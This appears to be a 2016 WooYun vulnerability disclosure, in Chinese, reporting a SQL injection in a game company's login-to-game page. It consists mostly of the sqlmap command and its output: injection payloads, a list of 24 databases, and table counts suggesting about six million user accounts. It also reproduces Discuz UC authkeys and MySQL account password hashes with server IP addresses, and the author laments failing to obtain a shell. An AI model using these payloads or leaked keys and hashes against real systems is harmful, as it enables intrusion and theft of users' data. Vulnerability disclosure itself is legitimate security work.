乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-27: 细节已通知厂商并且等待厂商处理中 2016-05-27: 厂商已经确认,细节仅向厂商公开 2016-06-06: 细节向核心白帽子及相关领域专家公开 2016-06-16: 细节向普通白帽子公开 2016-06-26: 细节向实习白帽子公开 2016-07-11: 细节向公众公开
shell不了好悲伤
在登录游戏的时候有注入点,UNION
http://long.gamebean.com/game_enter.php?s_id=1
跑sqlmap
sqlmap -u 'http://long.gamebean.com/game_enter.php?s_id=1' --dbs _ ___ ___| |_____ ___ ___ {1.0.4.4#dev}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 09:59:19[09:59:19] [INFO] resuming back-end DBMS 'mysql' [09:59:20] [INFO] testing connection to the target URLsqlmap got a 302 redirect to 'http://www.gamebean.com/login.php?ref=long.gamebean.com/dnslist.php'. Do you want to follow? [Y/n] nsqlmap resumed the following injection point(s) from stored session:---Parameter: s_id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: s_id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))OztZ) AND 'RdBD'='RdBD Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: s_id=-8227' UNION ALL SELECT CONCAT(0x716a6b6a71,0x78514469644943624c58794a73766a6954436456654979657a6e6658516564716145435362735458,0x71626a7171),NULL-- ----[09:59:23] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.2.10, Nginxback-end DBMS: MySQL 5.0.12[09:59:23] [INFO] fetching database names[09:59:23] [INFO] the SQL query used returns 24 entriesavailable databases [24]: [*] analyze[*] android[*] bbs[*] cjsh_user[*] cms[*] dx[*] football[*] game_stat[*] gcenter[*] gs[*] information_schema[*] lt_wap[*] mis[*] mysql[*] ourpalm[*] ssfee_platform[*] ssfee_platform_test[*] test[*] test_channel[*] union[*] user[*] user2406[*] webpay[*] yjws
涉及全站24个库
其中bbs库和user库和ssfee_platform推广平台库里面有200W+450W+560W用户帐号密码手机邮箱信息,去重后大约有600W用户
Database: bbs+----------------------+---------+| Table | Entries |+----------------------+---------+| uc_memberfields | 1980846 || uc_members | 1980846 || cdb_favoritethreads | 46470 || cdb_prompt | 21412 || cdb_memberfields | 18489 || cdb_members | 18488 || cdb_posts | 9945 || cdb_onlinetime | 8183 || cdb_threads | 3357 || uchome_creditlog | 1660 || cdb_promptmsgs | 1321 || uchome_pic | 1320 || uchome_tagblog | 1118 || uc_pms | 1095 || cdb_threadsmod | 709 || cdb_modworks | 666 || cdb_rsscaches | 651 || uchome_blog | 502 || uchome_blogfield | 502 || uchome_member | 483 || uchome_space | 483 || uchome_spacefield | 483 || uchome_album | 464 || uchome_feed | 425 || cdb_threadtags | 340 || uchome_spaceinfo | 320 || cdb_stylevars | 282 || uchome_stat | 245 || cdb_settings | 244 || cdb_tags | 243 || uchome_tag | 209 || uchome_friend | 126 || uchome_usertask | 96 || cdb_smilies | 80 || cdb_statvars | 73 || uc_newpm | 66 || cdb_typeoptions | 65 || uchome_notification | 65 || uchome_config | 64 || uchome_comment | 62 || cdb_forumfields | 55 || cdb_forums | 55 || cdb_stats | 52 || uchome_creditrule | 47 || cdb_spacecaches | 42 || cdb_caches | 41 || uc_notelist | 38 || cdb_faqs | 34 || uchome_visitor | 32 || cdb_request | 30 || uc_friends | 29 || cdb_debateposts | 28 || cdb_favorites | 28 || cdb_favoriteforums | 25 || uchome_magic | 25 || cdb_magiclog | 24 || uc_settings | 24 || uchome_doing | 24 || uchome_magicstore | 24 || uchome_poke | 22 || uchome_magicinlog | 21 || uchome_post | 21 || uchome_usermagic | 21 || uchome_polloption | 20 || uchome_thread | 20 || cdb_usergroups | 19 || cdb_failedlogins | 18 || uchome_share | 18 || cdb_moderators | 17 || uchome_click | 15 || cdb_ratelog | 14 || cdb_taskvars | 14 || cdb_crons | 12 || cdb_forumlinks | 12 || cdb_magics | 12 || cdb_projects | 11 || cdb_reportlog | 11 || uchome_magicuselog | 10 || cdb_words | 9 || uchome_usergroup | 9 || cdb_admingroups | 7 || cdb_polloptions | 7 || cdb_tasks | 7 || uchome_task | 7 || cdb_access | 6 || cdb_feeds | 6 || cdb_prompttype | 6 || cdb_styles | 6 || cdb_templates | 6 || uchome_eventclass | 6 || uchome_mtag | 6 || uchome_polluser | 6 || uchome_tagspace | 6 || cdb_attachments | 5 || cdb_navs | 5 || cdb_ranks | 5 || uchome_cron | 5 || cdb_admincustom | 4 || cdb_bbcodes | 4 || cdb_onlinelist | 4 || cdb_searchindex | 4 || cdb_typemodels | 4 || uchome_data | 4 || uchome_poll | 4 || uchome_pollfield | 4 || cdb_imagetypes | 3 || cdb_warnings | 3 || uc_applications | 3 || uchome_class | 3 || uchome_profield | 3 || uchome_report | 3 || uchome_statuser | 3 || cdb_addons | 2 || cdb_debates | 2 || cdb_polls | 2 || cdb_adminactions | 1 || cdb_adminsessions | 1 || cdb_attachmentfields | 1 || uc_admins | 1 || uc_failedlogins | 1 || uc_protectedmembers | 1 |+----------------------+---------+
Database: user+--------------------+---------+| Table | Entries |+--------------------+---------+| channel_extend | 12501938 || members_info | 4550839 || members_0 | 650074 || members_6 | 648069 || members_4 | 647573 || members_8 | 646946 || members_2 | 646486 || members_7 | 640523 || members_5 | 640124 || members_3 | 638772 || members_1 | 638475 || members_9 | 638271 || members_football | 66598 || membersinfo_0 | 29646 || membersinfo_6 | 29350 || membersinfo_4 | 29293 || membersinfo_5 | 29186 || membersinfo_2 | 29133 || membersinfo_8 | 29063 || membersinfo_3 | 28919 || membersinfo_7 | 28804 || membersinfo_1 | 28781 || membersinfo_9 | 28705 || footballuser_copy1 | 21563 || members_point | 20073 || members_fmworlds | 5047 || zq_point | 2703 || a | 1355 || footballuser | 1000 || invite | 25 || partner | 11 |+--------------------+---------+
Database: ssfee_platform+-------------------------------+---------+| Table | Entries |+-------------------------------+---------+| p_user_ip | 6538408 || user_info_201112 | 5643243 || user_info | 3971775 || p_area | 2869631 || advt_stat_hour_201201TO06 | 2474046 || user_info_201102 | 2234956 || register_after | 1738043 || advt_stat_hour | 1559224 || advt_stat_channel | 1082289 || advt_stat_hour_201101TO07 | 1069454 || u_ip | 376052 || advt_stat_hour_201101TO02 | 344281 || jiaose_sssg | 186520 || temp4 | 139504 || advt_stat_ye | 117002 || advt_stat_hour_20108TO10 | 101229 || p_area_Integration | 57078 || temp2 | 56822 || p_newsbase_201206 | 49845 || p_ip | 45309 || advt_stat_nq | 43122 || p_area_Integration_ip | 25881 || seek_gateway_fee | 24020 || p_area_register | 21292 || seek_gateway_fee_bak | 19978 || wapgame_zhuce | 19034 || jiaose_long | 16060 || user_info_mj | 11834 || sms_fee | 7404 || temp3 | 4679 || get_user | 4035 || wapgame_fee | 3921 || wapgame_fee_bak | 3626 || p_newsbase_tmp | 3421 || pc_jiaose | 3134 || user_stat | 2809 || p_ad_info | 2590 || seek_gateway_chengben | 2381 || seek_gateway_chengben_bak | 2368 || p_user_ip_copy | 2355 || wapgame_fee_201109 | 2355 || sms_fee1 | 1772 || jiaose_yan | 1096 || p_newscontent | 966 || wapgame_zhuce_tmp | 927 || p_ad | 895 || p_area_Integration_copy | 742 || lm_info | 704 || p_newsbase | 665 || haoduan_ds | 345 || bd | 295 || bd2 | 295 || lm_info_test | 288 || netgame_stat | 243 || temp | 216 || seek_gateway_fee_tmp1 | 154 || p_area_Integration_ip_copy2 | 132 || p_area_Integration_ip_copy1 | 118 || p_area_Integration_ip_ddd | 118 || p_area_Integration_test_copy1 | 116 || baidu | 112 || wapgame_fee_tmp | 101 || p_user_ip_are | 99 || seek_gateway_fee_g9 | 92 || kuapintai_fee | 91 || jiaose_ly | 70 || u_manage | 68 || advt_stat_tmp | 62 || seek_gateway_fee_tmp | 62 || seek_gateway_fee_lr | 60 || u_admin | 60 || netgame_stat_tmp | 49 || sms_fee2 | 48 || p_area_Integration_ip_copy | 36 || sms_fee3 | 24 || seek_gateway_chengben_lr | 17 || u_group | 15 || seek_gateway_chengben_tmp | 14 || wapgame_fee_bf2015 | 12 || p_user_ip_tmp | 10 || data_manage | 9 || p_newsclass | 9 || wapgame_qudao | 9 || p_admin | 6 || p_area_Integration_test_copy | 6 || seek_gateway_xz | 6 || data_admin | 4 || jiaose_djh | 4 || yuan | 4 || data_group | 2 || p_adver_admin | 2 || ios_xml | 1 || p_config | 1 |+-------------------------------+---------+
以及泄漏discuz的uckey
Database: bbsTable: uc_applications[3 entries]+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+| appid | ip | url | name | type | extra | charset | authkey | recvnote | synlogin | dbcharset | viewprourl | apifilename | tagtemplates |+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+| 1 | <blank> | http://219.232.240.2/home | 个人家园 | UCHOME | <blank> | utf-8 | F0q1C5wclbJcieF6i6F03d3eDd37V4K10aG6y5I7qeEd97mcN3b3t43a21UfGai6 | 1 | 1 | utf8 | <blank> | uc.php | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[<a href="{url}" target="_blank">{subject}</a>]]></item>\r\n <item id="fields">\r\n <item id="subject"><![CDATA[日志标题]]></item>\r\n <item id="uid"><![CDATA[用户 ID]]></item>\r\n <item id="username"><![CDATA[用户名]]></item>\r\n <item id="dateline"><![CDATA[日期]]></item>\r\n <item id="spaceurl"><![CDATA[空间地址]]></item>\r\n <item id="url"><![CDATA[日志地址]]></item>\r\n </item>\r\n</root> || 2 | <blank> | http://219.232.240.2/bbs | Discuz! | DISCUZ | <blank> | utf-8 | P221cb87c9h7a0s7v8b533eeL0X939dfQ9uc16K7b4Ieh6U1Wbg0X2h3K3S854v4 | 1 | 1 | utf8 | <blank> | uc.php | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[<a href="{url}" target="_blank">{subject}</a>]]></item>\r\n <item id="fields">\r\n <item id="subject"><![CDATA[标题]]></item>\r\n <item id="uid"><![CDATA[用户 ID]]></item>\r\n <item id="username"><![CDATA[发帖者]]></item>\r\n <item id="dateline"><![CDATA[日期]]></item>\r\n <item id="url"><![CDATA[主题地址]]></item>\r\n </item>\r\n</root> || 3 | <blank> | http://www.gamebean.com | gamebean门户 | OTHER | a:1:{s:7:"apppath";s:0:"";} | <blank> | b1f3g6Fp/bNb5b5yiaD0/DlK2j4ZoEv5FxmjqvbMU4uHv/6+Xj2l9pU | 0 | 0 | <blank> | <blank> | uc.php | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[]]></item>\r\n</root> |+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
getshell不了数据库密码
Database: mysqlTable: user[39 entries]+--------------+-------------------------------------------+---------------+| user | password | host |+--------------+-------------------------------------------+---------------+| root | *4B40B8C66CD7F7380E398A0CEBE5C6F388DD2995 | localhost || admin | *3BD10CEA2A23736837BB5F0EDF1A80DC5EE4B91A | 127.0.0.1 || root | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | % |mysql228| cctv | *9B91D3DD2A6DF0D4BD53BB9716EA231BE173D7B2 | % || channel | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | % |mysql228| rsync | *B8275A0D97CC0A636920525D16CD8F2FFE137971 | % || test | *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29 | % || gamebean | *9D7CD5A312DB9732C250F6009DC97C4027846EDD | % || wapgame | *028E35F5FDD9A172849C808EBE9A45938A3571E4 | % || slave | *093D835F112A3BCBA1C39EFEFD1ADF934EEB2C8A | % || repl | *3028A46C5F893BB70BFAA40E5F0C90F8BAD8E07A | % || bbs | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | % |mysql228| cms | *0DBB9DEC9800F895124E2D292E12D2CBE5565C58 | % || huawb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % || wangdy | *BE0BC36D760FFE1627F567894CE8EA4F692E819A | % || huawbtg | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % || zuol | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % || backup | *1827DC630AAEB1E997DB2B212CC94EFD9C431555 | 114.112.69.51 || huawb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.203 || huawb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.201 || huawbtg | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.201 || huawbtg | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.203 || dbbackup | *B8EA50B347976D08DBA6AFF751926429A04881EF | 172.16.% || wangyf | *4BE66E5176633B8101188EE0272832E033EA48F1 | % || bxb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % || gamebean_web | *54D36154FCBD065DFE7269E85C135EDB0DC715B8 | 219.232.240.2 || root_backup | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | 172.16.10.88 |mysql228| qingjingli | *773E83E4FDE66994A6E5A4948E27332A199A157E | % || backup | *3584A73767611418363012358FAFC887749A25E7 | 113.31.91.159 || admin | *3BD10CEA2A23736837BB5F0EDF1A80DC5EE4B91A | localhost || nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 172.16.108.% || mysqld | *B3500AC7C3F7205937036E78E40C103832F68BE6 | localhost || dbbackup | *B8EA50B347976D08DBA6AFF751926429A04881EF | 127.0.0.1 || root | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | 127.0.0.1 |mysql228| dbbackup | *B8EA50B347976D08DBA6AFF751926429A04881EF | % || nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 219.232.240.6 || nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 219.232.240.2 || nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 113.31.91.159 || nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | % |+--------------+-------------------------------------------+---------------+
找不到服务器ip还是shell不了呀 哎
过滤sql
危害等级:高
漏洞Rank:11
确认时间:2016-05-27 14:58
感谢对欢畅游戏安全问题的反馈
暂无